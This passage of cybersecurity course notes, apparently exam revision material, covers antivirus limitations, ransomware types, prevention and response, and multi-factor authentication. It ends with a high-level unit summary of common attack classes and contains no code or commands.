- Alert: Notifies user of potential threat for manual decision
Limitations of Antivirus
- Cannot detect zero-day malware if using only signature-based detection
- May impact system performance during scans
- Requires regular updates to remain effective
- Cannot protect against all social engineering attacks
- May produce false positives (flagging legitimate software)
- Advanced malware may disable or evade antivirus
Antivirus Software Examples
- Free: Windows Defender, Avast Free, AVG Free, Bitdefender Free
- Paid: Norton, Kaspersky, Bitdefender, McAfee, ESET
- Enterprise: CrowdStrike, Symantec Endpoint Protection, Sophos
Key Points for Examination:
- Antivirus detects, prevents, and removes malware from systems
- Detection methods: Signature-based, Heuristic, Behavioral, Cloud-based, AI/ML
- Signature-based detection cannot detect zero-day (new) malware
- Operations: Real-time scanning, on-demand scanning, email scanning
- Response actions: Quarantine, Delete, Disinfect, Block
- Regular signature updates are essential for effectiveness
3.19 Ransomware
Definition:
Ransomware is a type of malicious software that encrypts the victim's files or locks them out of their system, demanding a ransom payment (usually in cryptocurrency) to restore access.
Types of Ransomware
| Type | Description | Impact |
|---|---|---|
| Crypto Ransomware (Encrypting) | Encrypts files using strong encryption algorithms | Files inaccessible without decryption key |
| Locker Ransomware | Locks user out of operating system/device | Cannot access system but files may not be encrypted |
| Scareware | Displays fake warnings claiming system is infected | Demands payment for fake "cleaning" software |
| Doxware (Leakware) | Threatens to publish stolen data if ransom not paid | Combines encryption with data theft and extortion |
| RaaS (Ransomware-as-a-Service) | Criminal model where developers sell/rent ransomware to affiliates | Enables non-technical criminals to launch attacks |
Ransomware Distribution Methods
- Phishing Emails: Malicious attachments or links in emails
- Malicious Downloads: Infected software or drive-by downloads
- RDP Exploitation: Compromising exposed Remote Desktop Protocol
- Exploitation Kits: Automated tools exploiting software vulnerabilities
- Malvertising: Malicious advertisements on legitimate websites
- USB Drives: Infected removable media
Notable Ransomware Attacks
- WannaCry (2017): Affected 200,000+ computers in 150 countries; exploited Windows SMB vulnerability
- NotPetya (2017): Disguised as ransomware but designed for destruction; $10 billion in damages
- REvil/Sodinokibi: Major RaaS operation; $70 million demand from Kaseya attack
- Conti: Targeted hospitals, schools, government; leaked internal operations
- LockBit: Currently active RaaS with fast encryption
Prevention Measures
- Regular Backups: Maintain offline, tested backups (3-2-1 rule: 3 copies, 2 media types, 1 offsite)
- Email Security: Filter malicious attachments and links
- Patch Management: Keep systems and software updated
- User Training: Educate users on phishing and safe practices
- Network Segmentation: Limit lateral movement if infected
- Endpoint Protection: Use modern EDR with ransomware detection
- Disable RDP: Or use VPN and strong authentication for remote access
- Application Whitelisting: Allow only approved software to run
Response to Ransomware Attack
- Isolate: Disconnect infected systems from network immediately
- Identify: Determine ransomware variant (may help find decryptors)
- Report: Notify law enforcement and relevant authorities
- Do NOT Pay: Payment doesn't guarantee recovery and funds criminal activity
- Restore: Recover from clean backups after cleaning system
- Investigate: Determine root cause to prevent recurrence
Key Points for Examination:
- Ransomware encrypts files and demands payment for decryption
- Types: Crypto ransomware, Locker ransomware, Doxware, RaaS
- Spread through: Phishing, malicious downloads, RDP exploitation
- Notable examples: WannaCry, NotPetya, REvil, LockBit
- Prevention: Backups, patching, user training, endpoint protection
- Never pay ransom - it doesn't guarantee recovery
3.20 Multi-Factor Authentication (MFA)
Definition:
Multi-Factor Authentication (MFA) is a security mechanism that requires users to provide two or more verification factors to gain access to an account, application, or system. It adds layers of security beyond just a password.
The Three Authentication Factors
| Factor | Description | Examples |
|---|---|---|
| Something You Know | Knowledge-based credentials that only the user should know | Password, PIN, security questions |
| Something You Have | Physical items in the user's possession | Mobile phone (OTP), hardware token (YubiKey), smart card |
| Something You Are | Biometric characteristics unique to the user | Fingerprint, face recognition, iris scan, voice |
Additional Factors (Context-Based)
- Somewhere You Are (Location): GPS location, IP address geolocation
- Something You Do (Behavior): Typing patterns, device usage patterns
Common MFA Methods
| Method | How It Works | Security Level |
|---|---|---|
| SMS OTP | One-time code sent via text message | Low - vulnerable to SIM swapping and interception |
| Email OTP | One-time code sent to email | Low - depends on email account security |
| Authenticator Apps | Time-based OTP (TOTP) generated by apps like Google Authenticator, Microsoft Authenticator, Authy | High - codes generated locally, no network transmission |
| Push Notifications | App sends approval request to registered device | High - easy to use, but beware of push fatigue attacks |
| Hardware Security Keys | Physical devices using FIDO2/WebAuthn standards (YubiKey, Titan) | Very High - phishing-resistant, cryptographic authentication |
| Biometric | Fingerprint, face, or iris recognition | High - unique to individual; cannot be shared |
Benefits of MFA
- Significantly reduces account compromise risk (Microsoft reports 99.9% reduction)
- Protects against password-based attacks (phishing, brute force, credential stuffing)
- Provides layered security - single factor compromise doesn't grant access
- Meets compliance requirements (PCI-DSS, HIPAA, GDPR)
MFA Implementation Considerations
- User Experience: Balance security with convenience
- Recovery Options: Plan for lost devices (backup codes, recovery methods)
- Risk-Based MFA: Require additional factors only for suspicious activities
- Avoid SMS: Use authenticator apps or hardware keys for higher security
Key Points for Examination:
- MFA requires two or more authentication factors from different categories
- Three factors: Something you know, have, and are
- SMS OTP is vulnerable to SIM swapping - authenticator apps are more secure
- Hardware security keys (FIDO2) provide the strongest protection
- MFA significantly reduces (99.9%) account compromise risk
- Required by many compliance frameworks (PCI-DSS, HIPAA)
Unit III Summary
- Proxy servers act as intermediaries, with types including transparent, anonymous, and elite proxies; VPNs and Tor provide enhanced anonymity.
- Phishing uses fraudulent communications to steal data, with variants including spear phishing, whaling, vishing, and smishing.
- Password cracking techniques include brute force, dictionary attacks, and rainbow tables; defenses include salting and key stretching.
- Keyloggers capture keystrokes while spyware monitors broader system activity for malicious purposes.
- Malware types include viruses (require host), worms (self-propagating), Trojans (disguised), and ransomware (encryption-based extortion).
- Steganography hides messages within media files, distinct from cryptography which makes content unreadable.
- DoS/DDoS attacks overwhelm targets with traffic; DDoS uses distributed botnets for greater impact.
- SQL injection exploits improper input handling; prevention requires parameterized queries and input validation.
- Buffer overflow exploits memory handling flaws to execute arbitrary code.
- Wireless attacks include rogue APs, evil twins, and deauthentication attacks; WPA3 provides strongest protection.
- Identity theft involves using stolen personal information for fraud, with phishing being the primary acquisition method.